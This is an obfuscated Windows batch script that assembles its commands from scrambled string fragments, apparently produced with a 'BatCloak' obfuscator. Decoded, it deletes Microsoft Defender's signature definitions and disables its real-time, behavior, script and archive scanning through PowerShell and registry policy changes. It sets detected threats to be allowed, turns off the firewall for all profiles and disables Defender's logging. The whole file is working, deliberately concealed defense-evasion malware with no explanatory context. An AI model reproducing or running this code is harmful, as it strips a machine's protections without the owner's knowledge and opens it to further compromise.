@echo off
set "JmAq=set "
%JmAq%"HUMH=="
%JmAq%"qRedmLsjQU%HUMH%//github.c"
%JmAq%"tDSzycYvij%HUMH%atCloak"
%JmAq%"UBcCcRKGnq%HUMH%rem https:"
%JmAq%"eMUrGJayQp%HUMH%om/ch2sh/B"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%
%JmAq%"ffEdJqzZeg%HUMH%eference -"
%JmAq%"tDSzycYvij%HUMH%der\MpCmdR"
%JmAq%"pmLPkHwmMm%HUMH%n $true"
%JmAq%"eMUrGJayQp%HUMH%dows Defen"
%JmAq%"acVQsAXvmE%HUMH%DisableIOA"
%JmAq%"WgXdZuxojE%HUMH%VProtectio"
%JmAq%"qRedmLsjQU%HUMH% Files\Win"
%JmAq%"dyBxlaGVnL%HUMH%l Set-MpPr"
%JmAq%"OPqUzRrMER%HUMH%emoveDefin"
%JmAq%"fxWhrelNkU%HUMH%un.exe" -R"
%JmAq%"NajZUzxFAc%HUMH%itions -Al"
%JmAq%"UBcCcRKGnq%HUMH%C:\Program"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"OPqUzRrMER%HUMH%RealtimeMo"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"dyBxlaGVnL%HUMH%true""
%JmAq%"NajZUzxFAc%HUMH%nitoring $"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"dyBxlaGVnL%HUMH%true""
%JmAq%"OPqUzRrMER%HUMH%BehaviorMo"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"NajZUzxFAc%HUMH%nitoring $"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"dyBxlaGVnL%HUMH%ue""
%JmAq%"OPqUzRrMER%HUMH%BlockAtFir"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"NajZUzxFAc%HUMH%stSeen $tr"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"NajZUzxFAc%HUMH%tion $true"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"dyBxlaGVnL%HUMH%""
%JmAq%"OPqUzRrMER%HUMH%IOAVProtec"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"OPqUzRrMER%HUMH%PrivacyMod"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"NajZUzxFAc%HUMH%e $true""
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"dyBxlaGVnL%HUMH%rtupWithou"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"OPqUzRrMER%HUMH%reDisableU"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"NajZUzxFAc%HUMH%pdateOnSta"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"ffEdJqzZeg%HUMH%tEngine $t"
%JmAq%"acVQsAXvmE%HUMH%rue""
%JmAq%"fxWhrelNkU%HUMH%e -Signatu"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"NajZUzxFAc%HUMH%nning $tru"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"OPqUzRrMER%HUMH%ArchiveSca"
%JmAq%"dyBxlaGVnL%HUMH%e""
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"OPqUzRrMER%HUMH%IntrusionP"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"NajZUzxFAc%HUMH%reventionS"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"ffEdJqzZeg%HUMH%e""
%JmAq%"dyBxlaGVnL%HUMH%ystem $tru"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"OPqUzRrMER%HUMH%ScriptScan"
%JmAq%"dyBxlaGVnL%HUMH%""
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"fxWhrelNkU%HUMH%e -Disable"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"NajZUzxFAc%HUMH%ning $true"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"fxWhrelNkU%HUMH%e -SubmitS"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"NajZUzxFAc%HUMH%ent 2""
%JmAq%"OPqUzRrMER%HUMH%amplesCons"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"OPqUzRrMER%HUMH%orting 0""
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"fxWhrelNkU%HUMH%e -MAPSRep"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"OPqUzRrMER%HUMH%eatDefault"
%JmAq%"NajZUzxFAc%HUMH%Action 6 -"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"dyBxlaGVnL%HUMH%Force""
%JmAq%"fxWhrelNkU%HUMH%e -HighThr"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"fxWhrelNkU%HUMH%e -Moderat"
%JmAq%"NajZUzxFAc%HUMH%aultAction"
%JmAq%"OPqUzRrMER%HUMH%eThreatDef"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"dyBxlaGVnL%HUMH% 6""
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%      "
%UBcCcRKGnq%
%JmAq%"fxWhrelNkU%HUMH%e -LowThre"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"NajZUzxFAc%HUMH%ction 6""
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"OPqUzRrMER%HUMH%atDefaultA"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"dyBxlaGVnL%HUMH%""
%JmAq%"fxWhrelNkU%HUMH%e -SevereT"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"tDSzycYvij%HUMH%pPreferenc"
%JmAq%"NajZUzxFAc%HUMH%ltAction 6"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"eMUrGJayQp%HUMH%and "Set-M"
%JmAq%"OPqUzRrMER%HUMH%hreatDefau"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"fxWhrelNkU%HUMH%OCAL_MACHI"
%JmAq%"tDSzycYvij%HUMH%dd "HKEY_L"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"ffEdJqzZeg%HUMH%\Windows D"
%JmAq%"pmLPkHwmMm%HUMH%ntiSpyware"
%JmAq%"dyBxlaGVnL%HUMH%\Microsoft"
%JmAq%"acVQsAXvmE%HUMH%efender" /"
%JmAq%"NajZUzxFAc%HUMH%E\Policies"
%JmAq%"WgXdZuxojE%HUMH%v DisableA"
%JmAq%"zDSHBLdaWA%HUMH%f""
%JmAq%"ioQDKTLkqQ%HUMH%ORD /d 1 /"
%JmAq%"wslsQXSLko%HUMH% /t REG_DW"
%JmAq%"eMUrGJayQp%HUMH%and "Reg a"
%JmAq%"OPqUzRrMER%HUMH%NE\SOFTWAR"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%%ioQDKTLkqQ%%zDSHBLdaWA%
%JmAq%"tDSzycYvij%HUMH%DD ?hklm\s"
%JmAq%"WgXdZuxojE%HUMH%pyware /t "
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"wslsQXSLko%HUMH%/d 1 /f""
%JmAq%"OPqUzRrMER%HUMH%licies\mic"
%JmAq%"dyBxlaGVnL%HUMH%dows defen"
%JmAq%"NajZUzxFAc%HUMH%rosoft\win"
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"eMUrGJayQp%HUMH%and "REG A"
%JmAq%"acVQsAXvmE%HUMH%sableAntiS"
%JmAq%"ffEdJqzZeg%HUMH%der? /v Di"
%JmAq%"fxWhrelNkU%HUMH%oftware\po"
%JmAq%"pmLPkHwmMm%HUMH%REG_DWORD "
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%powershell"
%JmAq%"qRedmLsjQU%HUMH%.exe -comm"
%JmAq%"eMUrGJayQp%HUMH%and "netsh"
%JmAq%"fxWhrelNkU%HUMH%ll set all"
%JmAq%"OPqUzRrMER%HUMH%profiles s"
%JmAq%"NajZUzxFAc%HUMH%tate off""
%JmAq%"tDSzycYvij%HUMH% advfirewa"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"tDSzycYvij%HUMH%cies\Micro"
%JmAq%"OPqUzRrMER%HUMH%ws Defende"
%JmAq%"UBcCcRKGnq%HUMH%reg delete"
%JmAq%"fxWhrelNkU%HUMH%soft\Windo"
%JmAq%"NajZUzxFAc%HUMH%r" /f"
%JmAq%"qRedmLsjQU%HUMH% "HKLM\Sof"
%JmAq%"eMUrGJayQp%HUMH%tware\Poli"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"ffEdJqzZeg%HUMH%re" /t REG"
%JmAq%"OPqUzRrMER%HUMH%Defender" "
%JmAq%"WgXdZuxojE%HUMH%"1" /f"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"dyBxlaGVnL%HUMH%eAntiSpywa"
%JmAq%"NajZUzxFAc%HUMH%/v "Disabl"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"acVQsAXvmE%HUMH%_DWORD /d "
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%
%JmAq%"NajZUzxFAc%HUMH%/v "Disabl"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"dyBxlaGVnL%HUMH%eAntiVirus"
%JmAq%"WgXdZuxojE%HUMH%" /f"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"OPqUzRrMER%HUMH%Defender" "
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"acVQsAXvmE%HUMH%WORD /d "1"
%JmAq%"ffEdJqzZeg%HUMH%" /t REG_D"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%
%JmAq%"NajZUzxFAc%HUMH%pEngine" /"
%JmAq%"WgXdZuxojE%HUMH%d "0" /f"
%JmAq%"acVQsAXvmE%HUMH%EG_DWORD /"
%JmAq%"OPqUzRrMER%HUMH%Defender\M"
%JmAq%"ffEdJqzZeg%HUMH%ePus" /t R"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"dyBxlaGVnL%HUMH%v "MpEnabl"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"acVQsAXvmE%HUMH%leBehavior"
%JmAq%"wslsQXSLko%HUMH%WORD /d "1"
%JmAq%"dyBxlaGVnL%HUMH%rotection""
%JmAq%"OPqUzRrMER%HUMH%Defender\R"
%JmAq%"ffEdJqzZeg%HUMH% /v "Disab"
%JmAq%"ioQDKTLkqQ%HUMH%" /f"
%JmAq%"pmLPkHwmMm%HUMH%" /t REG_D"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"NajZUzxFAc%HUMH%eal-Time P"
%JmAq%"WgXdZuxojE%HUMH%Monitoring"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%%ioQDKTLkqQ%
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"pmLPkHwmMm%HUMH% REG_DWORD"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"WgXdZuxojE%HUMH%ection" /t"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"acVQsAXvmE%HUMH%leIOAVProt"
%JmAq%"dyBxlaGVnL%HUMH%rotection""
%JmAq%"NajZUzxFAc%HUMH%eal-Time P"
%JmAq%"wslsQXSLko%HUMH% /d "1" /f"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"ffEdJqzZeg%HUMH% /v "Disab"
%JmAq%"OPqUzRrMER%HUMH%Defender\R"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"pmLPkHwmMm%HUMH%" /t REG_D"
%JmAq%"OPqUzRrMER%HUMH%Defender\R"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"dyBxlaGVnL%HUMH%rotection""
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"wslsQXSLko%HUMH%WORD /d "1"
%JmAq%"ioQDKTLkqQ%HUMH%" /f"
%JmAq%"NajZUzxFAc%HUMH%eal-Time P"
%JmAq%"WgXdZuxojE%HUMH%Protection"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"acVQsAXvmE%HUMH%leOnAccess"
%JmAq%"ffEdJqzZeg%HUMH% /v "Disab"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%%ioQDKTLkqQ%
%JmAq%"dyBxlaGVnL%HUMH%rotection""
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"ioQDKTLkqQ%HUMH%" /f"
%JmAq%"pmLPkHwmMm%HUMH%" /t REG_D"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"WgXdZuxojE%HUMH%Monitoring"
%JmAq%"acVQsAXvmE%HUMH%leRealtime"
%JmAq%"NajZUzxFAc%HUMH%eal-Time P"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"ffEdJqzZeg%HUMH% /v "Disab"
%JmAq%"wslsQXSLko%HUMH%WORD /d "1"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"OPqUzRrMER%HUMH%Defender\R"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%%ioQDKTLkqQ%
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"OPqUzRrMER%HUMH%Defender\R"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"NajZUzxFAc%HUMH%eal-Time P"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"wslsQXSLko%HUMH%_DWORD /d "
%JmAq%"ffEdJqzZeg%HUMH% /v "Disab"
%JmAq%"acVQsAXvmE%HUMH%leScanOnRe"
%JmAq%"WgXdZuxojE%HUMH%altimeEnab"
%JmAq%"dyBxlaGVnL%HUMH%rotection""
%JmAq%"ioQDKTLkqQ%HUMH%"1" /f"
%JmAq%"pmLPkHwmMm%HUMH%le" /t REG"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%%ioQDKTLkqQ%
%JmAq%"ffEdJqzZeg%HUMH%eEnhancedN"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"pmLPkHwmMm%HUMH%_DWORD /d "
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"WgXdZuxojE%HUMH%ns" /t REG"
%JmAq%"OPqUzRrMER%HUMH%Defender\R"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"NajZUzxFAc%HUMH%eporting" "
%JmAq%"acVQsAXvmE%HUMH%otificatio"
%JmAq%"dyBxlaGVnL%HUMH%/v "Disabl"
%JmAq%"wslsQXSLko%HUMH%"1" /f"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%%wslsQXSLko%
%JmAq%"ffEdJqzZeg%HUMH%ockAtFirst"
%JmAq%"WgXdZuxojE%HUMH%EG_DWORD /"
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"acVQsAXvmE%HUMH%Seen" /t R"
%JmAq%"NajZUzxFAc%HUMH%pyNet" /v "
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"dyBxlaGVnL%HUMH%"DisableBl"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"pmLPkHwmMm%HUMH%d "1" /f"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"OPqUzRrMER%HUMH%Defender\S"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%
%JmAq%"NajZUzxFAc%HUMH%pyNet" /v "
%JmAq%"dyBxlaGVnL%HUMH%"SpynetRep"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"OPqUzRrMER%HUMH%Defender\S"
%JmAq%"WgXdZuxojE%HUMH% /d "0" /f"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"acVQsAXvmE%HUMH% REG_DWORD"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"ffEdJqzZeg%HUMH%orting" /t"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%
%JmAq%"eMUrGJayQp%HUMH%re\Policie"
%JmAq%"dyBxlaGVnL%HUMH%"SubmitSam"
%JmAq%"tDSzycYvij%HUMH%s\Microsof"
%JmAq%"NajZUzxFAc%HUMH%pyNet" /v "
%JmAq%"OPqUzRrMER%HUMH%Defender\S"
%JmAq%"pmLPkHwmMm%HUMH%2" /f"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"WgXdZuxojE%HUMH%DWORD /d ""
%JmAq%"ffEdJqzZeg%HUMH%plesConsen"
%JmAq%"fxWhrelNkU%HUMH%t\Windows "
%JmAq%"qRedmLsjQU%HUMH%KLM\Softwa"
%JmAq%"acVQsAXvmE%HUMH%t" /t REG_"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%
%JmAq%"UBcCcRKGnq%HUMH%cls"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"OPqUzRrMER%HUMH%\Autologge"
%JmAq%"fxWhrelNkU%HUMH%ontrol\WMI"
%JmAq%"acVQsAXvmE%HUMH%" /t REG_D"
%JmAq%"pmLPkHwmMm%HUMH%" /f"
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%JmAq%"NajZUzxFAc%HUMH%r\Defender"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\C"
%JmAq%"ffEdJqzZeg%HUMH% /v "Start"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%JmAq%"dyBxlaGVnL%HUMH%ApiLogger""
%JmAq%"WgXdZuxojE%HUMH%WORD /d "0"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%
%JmAq%"WgXdZuxojE%HUMH%_DWORD /d "
%JmAq%"acVQsAXvmE%HUMH%rt" /t REG"
%JmAq%"dyBxlaGVnL%HUMH%AuditLogge"
%JmAq%"NajZUzxFAc%HUMH%r\Defender"
%JmAq%"fxWhrelNkU%HUMH%ontrol\WMI"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\C"
%JmAq%"OPqUzRrMER%HUMH%\Autologge"
%JmAq%"ffEdJqzZeg%HUMH%r" /v "Sta"
%JmAq%"pmLPkHwmMm%HUMH%"0" /f"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%
%JmAq%"UBcCcRKGnq%HUMH%cls"
%UBcCcRKGnq%
